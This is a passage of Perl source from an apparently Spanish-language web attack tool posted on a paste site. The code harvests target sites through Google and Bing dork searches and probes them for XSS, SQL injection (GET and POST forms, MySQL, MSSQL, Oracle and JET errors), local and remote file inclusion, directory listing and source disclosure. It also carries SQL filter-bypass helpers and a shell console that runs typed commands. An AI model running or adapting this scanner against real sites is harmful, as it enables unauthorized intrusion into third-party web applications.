  3165.                     my $final = $orden . $partedos;
  3166.                     for my $strin (@pa) {
  3167.                         chomp $strin;
  3168.                         $final =~ s/doddyhackman/$strin/;
  3169.                         $code = toma( $page . "?" . $final );
  3170.                         my $strin = "\Q$strin\E";
  3171.                         if ( $code =~ /$strin/ ) {
  3172.                             push( @get_founds, $page . "?" . $final );
  3173.                         }
  3174.                     }
  3175.                 }
  3176.             }
  3177.         }
  3178.  
  3179.         my @get_founds = repes(@get_founds);
  3180.         if ( int(@get_founds) ne 0 ) {
  3181.             for (@get_founds) {
  3182.                 savefile( "xss-logs.txt", "[+] XSS Found : $_" );
  3183.                 printear( "[+] XSS Found : $_\n\a", "text", "11", "5" );
  3184.             }
  3185.         }
  3186.  
  3187.         my @post_founds = repes(@post_founds);
  3188.         if ( int(@post_founds) ne 0 ) {
  3189.             for my $t (@post_founds) {
  3190.                 if ( $t =~ /^\d+$/ ) {
  3191.                     savefile( "xss-logs.txt", "[+] XSS : Form $t in $page" );
  3192.                     printear( "[+] XSS : Form $t in $page\n\a",
  3193.                         "text", "11", "5" );
  3194.                 }
  3195.             }
  3196.         }
  3197.     }
  3198.  
  3199.     sub simple {
  3200.  
  3201.         my $code  = toma( $_[0] );
  3202.         my @links = get_links($code);
  3203.  
  3204.         for my $com (@links) {
  3205.             my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  3206.             if ( $path =~ /\/(.*)$/ ) {
  3207.                 my $path1 = $1;
  3208.                 $_[0] =~ s/$path1//ig;
  3209.                 my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
  3210.                 if ( $path =~ /(.*)\// ) {
  3211.                     my $parche = $1;
  3212.                     unless ( $repetidos =~ /$parche/ ) {
  3213.                         $repetidos .= " " . $parche;
  3214.                         my $code = toma( "http://" . $auth . $parche );
  3215.                         if ( $code =~ /Index of (.*)</ig ) {
  3216.                             my $dir_found = $1;
  3217.                             chomp $dir_found;
  3218.                             printear(
  3219.                                 "[+] Directory Found : "
  3220.                                   . "http://"
  3221.                                   . $auth
  3222.                                   . $parche . "\n",
  3223.                                 "text", "11", "5"
  3224.                             );
  3225.                             savefile( "dir-logs.txt",
  3226.                                     "[+] Directory Found : "
  3227.                                   . "http://"
  3228.                                   . $auth
  3229.                                   . $parche );
  3230.                         }
  3231.                     }
  3232.                 }
  3233.             }
  3234.         }
  3235.     }
  3236.  
  3237.     sub scansql {
  3238.  
  3239.         my $page  = shift;
  3240.         my $copia = $page;
  3241.  
  3242.         $co = toma( $page . "'" );
  3243.  
  3244.         if ( $co =~
  3245. /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
  3246.             || $co =~ /mysql_free_result/ig
  3247.             || $co =~ /mysql_fetch_assoc/ig
  3248.             || $co =~ /mysql_num_rows/ig
  3249.             || $co =~ /mysql_fetch_array/ig
  3250.             || $co =~ /mysql_fetch_assoc/ig
  3251.             || $co =~ /mysql_query/ig
  3252.             || $co =~ /mysql_free_result/ig
  3253.             || $co =~ /equivocado en su sintax/ig
  3254.             || $co =~ /You have an error in your SQL syntax/ig
  3255.             || $co =~ /Call to undefined function/ig )
  3256.         {
  3257.             savefile( "sql-logs.txt", "[+] SQL : $page" );
  3258.             printear( "[+] SQLI : $page\a\n", "text", "11", "5" );
  3259.         }
  3260.         else {
  3261.  
  3262.             if ( $page =~ /(.*)\?(.*)/ ) {
  3263.                 my $page = $1;
  3264.  
  3265.                 my @testar = HTML::Form->parse( toma($page), "/" );
  3266.                 my @botones_names;
  3267.                 my @botones_values;
  3268.                 my @orden;
  3269.                 my @get_founds;
  3270.                 my @post_founds;
  3271.                 my @ordenuno;
  3272.                 my @ordendos;
  3273.  
  3274.                 my $contador_forms = 0;
  3275.  
  3276.                 my $valor = "doddyhackman";
  3277.  
  3278.                 for my $test (@testar) {
  3279.                     $contador_forms++;
  3280.                     if ( $test->method eq "POST" ) {
  3281.                         my @inputs = $test->inputs;
  3282.                         for my $in (@inputs) {
  3283.                             if ( $in->type eq "submit" ) {
  3284.                                 if ( $in->name eq "" ) {
  3285.                                     push( @botones_names, "submit" );
  3286.                                 }
  3287.                                 push( @botones_names,  $in->name );
  3288.                                 push( @botones_values, $in->value );
  3289.                             }
  3290.                             else {
  3291.                                 push( @ordenuno, $in->name, "'" );
  3292.                             }
  3293.                         }
  3294.  
  3295.                         for my $n ( 0 .. int(@botones_names) - 1 ) {
  3296.                             my @preuno = @ordenuno;
  3297.                             push( @preuno,
  3298.                                 $botones_names[$n], $botones_values[$n] );
  3299.                             my $code = $nave->post( $page, \@preuno )->content;
  3300.                             if ( $code =~
  3301. /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig
  3302.                                 || $code =~ /mysql_free_result/ig
  3303.                                 || $code =~ /mysql_fetch_assoc/ig
  3304.                                 || $code =~ /mysql_num_rows/ig
  3305.                                 || $code =~ /mysql_fetch_array/ig
  3306.                                 || $code =~ /mysql_fetch_assoc/ig
  3307.                                 || $code =~ /mysql_query/ig
  3308.                                 || $code =~ /mysql_free_result/ig
  3309.                                 || $code =~ /equivocado en su sintax/ig
  3310.                                 || $code =~
  3311.                                 /You have an error in your SQL syntax/ig
  3312.                                 || $code =~ /Call to undefined function/ig )
  3313.                             {
  3314.                                 if (   $test->attr(name) eq ""
  3315.                                     or $test->attr(name) eq " " )
  3316.                                 {
  3317.                                     push( @post_founds, $contador_forms );
  3318.                                 }
  3319.                                 else {
  3320.                                     push( @post_founds, $test->attr(name) );
  3321.                                 }
  3322.                             }
  3323.                         }
  3324.                     }
  3325.  
  3326.                     my @post_founds = repes(@post_founds);
  3327.                     if ( int(@post_founds) ne 0 ) {
  3328.                         for my $t (@post_founds) {
  3329.                             if ( $t =~ /^\d+$/ ) {
  3330.                                 savefile( "sql-logs.txt",
  3331.                                     "[+] SQLI : Form $t in $page" );
  3332.                                 printear(
  3333.                                     "[+] SQLI : Form $t in $page\n\a", "text",
  3334.                                     "11",                              "5"
  3335.                                 );
  3336.                             }
  3337.                         }
  3338.                     }
  3339.                 }
  3340.             }
  3341.         }
  3342.     }
  3343.  
  3344.     sub access {
  3345.  
  3346.         my $page = shift;
  3347.         $code1 = toma( $page . "'" );
  3348.         if (   $code1 =~ /Microsoft JET Database/ig
  3349.             or $code1 =~ /ODBC Microsoft Access Driver/ig )
  3350.         {
  3351.             printear( "[+] Jet DB : $page\a\n", "text", "11", "5" );
  3352.             savefile( "jetdb-logs.txt", $page );
  3353.         }
  3354.     }
  3355.  
  3356.     sub mssql {
  3357.  
  3358.         my $page = shift;
  3359.         $code1 = toma( $page . "'" );
  3360.         if ( $code1 =~ /ODBC SQL Server Driver/ig ) {
  3361.             printear( "[+] MSSQL : $page\a\n", "text", "11", "5" );
  3362.             savefile( "mssql-logs.txt", $page );
  3363.         }
  3364.     }
  3365.  
  3366.     sub oracle {
  3367.  
  3368.         my $page = shift;
  3369.         $code1 = toma( $page . "'" );
  3370.         if ( $code1 =~ /Microsoft OLE DB Provider for Oracle/ig ) {
  3371.             printear( "[+] Oracle : $page\a\n", "text", "11", "5" );
  3372.             savefile( "oracle-logs.txt", $page );
  3373.         }
  3374.     }
  3375.  
  3376.     sub rfi {
  3377.         my $page = shift;
  3378.         $code1 = toma( $page . "http:/www.supertangas.com/" );
  3379.         if ( $code1 =~ /Los mejores TANGAS de la red/ig )
  3380.         {    #Esto es conocimiento de verdad xDDD
  3381.             printear( "[+] RFI : $page\a\n", "text", "11", "5" );
  3382.             savefile( "rfi-logs.txt", $page );
  3383.         }
  3384.     }
  3385.  
  3386.     sub lfi {
  3387.         my $page = shift;
  3388.         $code1 = toma( $page . "'" );
  3389.         if ( $code1 =~ /No such file or directory in <b>(.*)<\/b> on line/ig ) {
  3390.             printear( "[+] LFI : $page\a\n", "text", "11", "5" );
  3391.             savefile( "lfi-logs.txt", $page );
  3392.         }
  3393.     }
  3394.  
  3395.     sub fsd {
  3396.         my $page = shift;
  3397.         my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
  3398.         if ( $path =~ /\/(.*)$/ ) {
  3399.             my $me = $1;
  3400.             $code1 = toma( $page . $me );
  3401.             if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
  3402.                 printear(
  3403.                     "[+] Full Source Discloure : $page\a\n", "text",
  3404.                     "11",                                    "5"
  3405.                 );
  3406.                 savefile( "fpd-logs.txt", $page );
  3407.             }
  3408.         }
  3409.     }
  3410.  
  3411.     sub men {
  3412.         printear( "\n\n[+] Scan Type : \n\n", "text", "5", "5" );
  3413.         printear( "
  3414. [X] : XSS
  3415. [S] : SQL GET/POST
  3416. [K] : SQL GET
  3417. [Q] : SQL GET + Admin
  3418. [Y] : Directory listing
  3419. [M] : MSSQL
  3420. [J] : Jet Database
  3421. [O] : Oracle
  3422. [L] : LFI
  3423. [R] : RFI
  3424. [F] : Full Source Discloure
  3425. [HT] : HTTP Information
  3426. [A] : All
  3427. ", "text", "13", "5" );
  3428.         my $option = printear( "\n[Options] : ", "stdin", "11", "13" );
  3429.         return $option;
  3430.     }
  3431.  
  3432.     sub finish_now {
  3433.         printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  3434.         <stdin>;
  3435.         estoydentro();
  3436.     }
  3437.  
  3438.     sub bing {
  3439.  
  3440.         my ( $a, $b ) = @_;
  3441.         for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  3442.             my $code =
  3443.               toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
  3444.  
  3445.             while ( $code =~ /<h3><a href="(.*?)"/mig ) {
  3446.                 push( @founds, $1 );
  3447.             }
  3448.         }
  3449.         my @founds = repes( cortar(@founds) );
  3450.         return @founds;
  3451.     }
  3452.  
  3453.     sub google {
  3454.         my ( $a, $b ) = @_;
  3455.         my @founds;
  3456.         for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
  3457.             $code =
  3458.               toma( "http://www.google.com.ar/search?hl=&q="
  3459.                   . $a
  3460.                   . "&start=$pages" );
  3461.             while ( $code =~ /(?<="r"><. href=")(.+?)"/mig ) {
  3462.                 my $url = $1;
  3463.                 if ( $url =~ /\/url\?q\=(.*?)\&amp\;/ ) {
  3464.                     push( @founds, uri_unescape($1) );
  3465.                 }
  3466.             }
  3467.         }
  3468.         my @founds = repes( cortar(@founds) );
  3469.         return @founds;
  3470.     }
  3471.  
  3472. }    ##
  3473.  
  3474. sub load_cmd {
  3475.  
  3476.     head_console();
  3477.  
  3478.     sub head_console {
  3479.         clean();
  3480.         printear( "
  3481.  
  3482.  
  3483.  @@@@   @@@@   @    @   @@@    @@@@   @     @@@@@
  3484. @    @ @    @  @@   @  @   @  @    @  @     @    
  3485. @      @    @  @@   @  @      @    @  @     @    
  3486. @      @    @  @ @  @  @      @    @  @     @    
  3487. @      @    @  @ @  @   @@@   @    @  @     @@@@
  3488. @      @    @  @  @ @      @  @    @  @     @    
  3489. @      @    @  @   @@      @  @    @  @     @    
  3490. @    @ @    @  @   @@  @   @  @    @  @     @    
  3491.  @@@@   @@@@   @    @   @@@    @@@@   @@@@@ @@@@@
  3492.  
  3493.  
  3494.  
  3495. ", "text", "7", "5" );
  3496.     }
  3497.  
  3498.     while (1) {
  3499.         my $cmd = printear( "\n\n[+] Command : ", "stdin", "11", "13" );
  3500.         print "\n\n";
  3501.         if ( $cmd eq "exit" ) {
  3502.             printear( "\n\n[+] Finished\n\n", "text", "13", "5" );
  3503.             <stdin>;
  3504.             estoydentro();
  3505.         }
  3506.         else {
  3507.             my $data = getdatanownownownow();
  3508.             if ( $data =~ /colors=n/ ) {
  3509.                 system($cmd);
  3510.             }
  3511.             else {
  3512.                 cprint "\x037";
  3513.                 system($cmd);
  3514.                 cprint "\x030";
  3515.             }
  3516.         }
  3517.     }
  3518.  
  3519. }    ##
  3520.  
  3521. ##
  3522.  
  3523. ##Funciones secundarias ###
  3524.  
  3525. sub toma {
  3526.     return $nave->get( $_[0] )->content;
  3527. }
  3528.  
  3529. sub tomados {
  3530.     return $nave->get( $_[0] );
  3531. }
  3532.  
  3533. sub tomar {
  3534.     my ( $web, $var ) = @_;
  3535.     return $nave->post( $web, [ %{$var} ] )->content;
  3536. }
  3537.  
  3538. sub ver_length {
  3539.     return true if length( $_[0] ) == 32;
  3540. }
  3541.  
  3542. sub savefile {
  3543.     open( SAVE, ">>logs/" . $_[0] );
  3544.     print SAVE $_[1] . "\n";
  3545.     close SAVE;
  3546. }
  3547.  
  3548. sub get_links {
  3549.  
  3550.     $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
  3551.     return @links;
  3552.  
  3553.     sub agarrar {
  3554.         my ( $a, %b ) = @_;
  3555.         push( @links, values %b );
  3556.     }
  3557. }
  3558.  
  3559. sub savefilear {
  3560.     open( SAVE, ">>logs/webs/" . $_[0] );
  3561.     print SAVE $_[1] . "\n";
  3562.     close SAVE;
  3563. }
  3564.  
  3565. sub partimealmedio {
  3566.     my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
  3567.     my $save = $auth;
  3568.     $save =~ s/:/_/;
  3569.     return $save;
  3570. }
  3571.  
  3572. sub encode {
  3573.     my $string = $_[0];
  3574.     $hex = '0x';
  3575.     for ( split //, $string ) {
  3576.         $hex .= sprintf "%x", ord;
  3577.     }
  3578.     return $hex;
  3579. }
  3580.  
  3581. sub decode {
  3582.     $_[0] =~ s/^0x//;
  3583.     $encode = join q[], map { chr hex } $_[0] =~ /../g;
  3584.     return $encode;
  3585. }
  3586.  
  3587. sub bypass {
  3588.     if    ( $_[0] eq "/*" )  { return ( "/**/", "/**/" ); }
  3589.     elsif ( $_[0] eq "%20" ) { return ( "%20",  "%00" ); }
  3590.     else                     { return ( "+",    "--" ); }
  3591. }
  3592.  
  3593. sub ascii {
  3594.     return join ',', unpack "U*", $_[0];
  3595. }
  3596.  
  3597. sub ascii_de {
  3598.     $_[0] = join q[], map { chr } split q[,], $_[0];
  3599.     return $_[0];
  3600. }
  3601.  
  3602. sub installer_kobra {
  3603.     unless ( -d "/logs/webs" ) {
  3604.         mkdir( "logs/",      777 );
  3605.         mkdir( "logs/webs/", 777 );
  3606.     }
  3607. }
  3608.  
  3609. sub cortar {
  3610.     my @nuevo;
  3611.     for (@_) {
  3612.         if ( $_ =~ /=/ ) {
  3613.             @tengo = split( "=", $_ );
  3614.             push( @nuevo, @tengo[0] . "=" );
  3615.         }
  3616.         else {
  3617.             push( @nuevo, $_ );
  3618.         }
  3619.     }
  3620.     return @nuevo;
  3621. }
  3622.  
  3623. sub installer_par {
  3624.     unless ( -d "logs/" ) {
  3625.         mkdir( "logs/", "777" );
  3626.     }
  3627. }
  3628.  
  3629. sub repes {
  3630.     my @limpio;
  3631.     foreach $test (@_) {
  3632.         push @limpio, $test unless $repe{$test}++;
  3633.     }
  3634.     return @limpio;
  3635. }
  3636.  
  3637. sub savewords {
  3638.     open( FILE, $_[0] );
  3639.     @words = <FILE>;
  3640.     close FILE;
  3641.     for (@words) {
  3642.         push( @r, $_ );
  3643.     }
  3644.     return (@r);
  3645. }
  3646.  
  3647. sub getdatanownownownow {
  3648.     open my $FILE, q[<], "data.txt";
  3649.     my $word = join q[], <$FILE>;
  3650.     close $FILE;
  3651.     return $word;
  3652. }
  3653.  
  3654. ##
  3655.  
  3656. #The End ?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement